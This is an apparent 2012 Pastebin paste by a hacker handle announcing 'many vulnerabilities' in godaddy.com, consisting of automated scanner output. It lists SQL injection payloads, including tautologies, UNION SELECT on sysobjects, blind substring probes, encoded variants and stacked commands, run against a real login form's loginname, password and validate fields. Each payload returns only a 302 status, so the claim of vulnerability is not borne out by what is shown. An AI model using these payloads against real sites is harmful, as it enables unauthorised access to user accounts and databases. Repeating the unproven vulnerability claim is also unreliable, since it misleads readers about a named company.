Pastebin launched a little side project called VERYVIRAL.com, check it out ;-) Want more features on Pastebin? Sign Up, it's FREE!
Guest

http://www.godaddy.com/ many vulnerabilities found by: @A

By: a guest on Sep 11th, 2012  |  syntax: None  |  size: 4.58 KB  |  views: 7,858  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. http://www.godaddy.com/
  2.  
  3. many vulnerabilities found
  4.  
  5. by: @AnonymousOwn3r http://twitter.com/AnonymousOwn3r
  6.  
  7.  
  8.  
  9. SQL Injection String Tests Summary (43860 results recorded)
  10. Failures:      
  11. 51
  12. Warnings:      
  13. 0
  14. Passes:
  15. 43809
  16. SQL Injection String Test Results
  17. loginname
  18. Submitted Form State:
  19.  
  20.     password:
  21.     validate: 1
  22.  
  23. Results:
  24. Server Status Code: 302 Found
  25. Tested value: %31%27%20%4F%52%20%27%31%27%3D%27%31
  26. Server Status Code: 302 Found
  27. Tested value: 1 UNI/**/ON SELECT ALL FROM WHERE
  28. Server Status Code: 302 Found
  29. Tested value: 1' OR '1'='1
  30. Server Status Code: 302 Found
  31. Tested value: 1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = 'U' --
  32. Server Status Code: 302 Found
  33. Tested value: 1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 116
  34. Server Status Code: 302 Found
  35. Tested value: &#49&#39&#32&#79&#82&#32&#39&#49&#39&#61&#39&#49
  36. Server Status Code: 302 Found
  37. Tested value: ' OR username IS NOT NULL OR username = '
  38. Server Status Code: 302 Found
  39. Tested value: 1' AND non_existant_table = '1
  40. Server Status Code: 302 Found
  41. Tested value: 1'1
  42. Server Status Code: 302 Found
  43. Tested value: '; DESC users; --
  44. Server Status Code: 302 Found
  45. Tested value: 1 AND USER_NAME() = 'dbo'
  46. Server Status Code: 302 Found
  47. Tested value: 1' AND 1=(SELECT COUNT(*) FROM tablenames); --
  48. Server Status Code: 302 Found
  49. Tested value: 1 AND 1=1
  50. Server Status Code: 302 Found
  51. Tested value: 1 EXEC XP_
  52. Server Status Code: 302 Found
  53. Tested value: 1'1
  54. Server Status Code: 302 Found
  55. Tested value: 1' OR '1'='1
  56. Server Status Code: 302 Found
  57. Tested value: 1 OR 1=1
  58.  
  59. password
  60. Submitted Form State:
  61.  
  62.     loginname:
  63.     validate: 1
  64.  
  65. Results:
  66. Server Status Code: 302 Found
  67. Tested value: &#49&#39&#32&#79&#82&#32&#39&#49&#39&#61&#39&#49
  68. Server Status Code: 302 Found
  69. Tested value: 1' OR '1'='1
  70. Server Status Code: 302 Found
  71. Tested value: %31%27%20%4F%52%20%27%31%27%3D%27%31
  72. Server Status Code: 302 Found
  73. Tested value: 1 UNI/**/ON SELECT ALL FROM WHERE
  74. Server Status Code: 302 Found
  75. Tested value: 1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = 'U' --
  76. Server Status Code: 302 Found
  77. Tested value: 1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 116
  78. Server Status Code: 302 Found
  79. Tested value: ' OR username IS NOT NULL OR username = '
  80. Server Status Code: 302 Found
  81. Tested value: 1' AND non_existant_table = '1
  82. Server Status Code: 302 Found
  83. Tested value: 1'1
  84. Server Status Code: 302 Found
  85. Tested value: '; DESC users; --
  86. Server Status Code: 302 Found
  87. Tested value: 1 AND USER_NAME() = 'dbo'
  88. Server Status Code: 302 Found
  89. Tested value: 1' AND 1=(SELECT COUNT(*) FROM tablenames); --
  90. Server Status Code: 302 Found
  91. Tested value: 1 AND 1=1
  92. Server Status Code: 302 Found
  93. Tested value: 1 EXEC XP_
  94. Server Status Code: 302 Found
  95. Tested value: 1'1
  96. Server Status Code: 302 Found
  97. Tested value: 1' OR '1'='1
  98. Server Status Code: 302 Found
  99. Tested value: 1 OR 1=1
  100.  
  101. validate
  102. Submitted Form State:
  103.  
  104.     loginname:
  105.     password:
  106.  
  107. Results:
  108. Server Status Code: 302 Found
  109. Tested value: &#49&#39&#32&#79&#82&#32&#39&#49&#39&#61&#39&#49
  110. Server Status Code: 302 Found
  111. Tested value: 1' OR '1'='1
  112. Server Status Code: 302 Found
  113. Tested value: %31%27%20%4F%52%20%27%31%27%3D%27%31
  114. Server Status Code: 302 Found
  115. Tested value: 1 UNI/**/ON SELECT ALL FROM WHERE
  116. Server Status Code: 302 Found
  117. Tested value: 1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = 'U' --
  118. Server Status Code: 302 Found
  119. Tested value: 1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 116
  120. Server Status Code: 302 Found
  121. Tested value: ' OR username IS NOT NULL OR username = '
  122. Server Status Code: 302 Found
  123. Tested value: 1' AND non_existant_table = '1
  124. Server Status Code: 302 Found
  125. Tested value: 1'1
  126. Server Status Code: 302 Found
  127. Tested value: '; DESC users; --
  128. Server Status Code: 302 Found
  129. Tested value: 1 AND USER_NAME() = 'dbo'
  130. Server Status Code: 302 Found
  131. Tested value: 1' AND 1=(SELECT COUNT(*) FROM tablenames); --
  132. Server Status Code: 302 Found
  133. Tested value: 1 AND 1=1
  134. Server Status Code: 302 Found
  135. Tested value: 1 EXEC XP_
  136. Server Status Code: 302 Found
  137. Tested value: 1'1
  138. Server Status Code: 302 Found
  139. Tested value: 1' OR '1'='1
  140. Server Status Code: 302 Found
  141. Tested value: 1 OR 1=1
  142.  
  143. http://www.godaddy.com/
  144.  
  145. many vulnerabilities found
  146.  
  147. by: @AnonymousOwn3r http://twitter.com/AnonymousOwn3r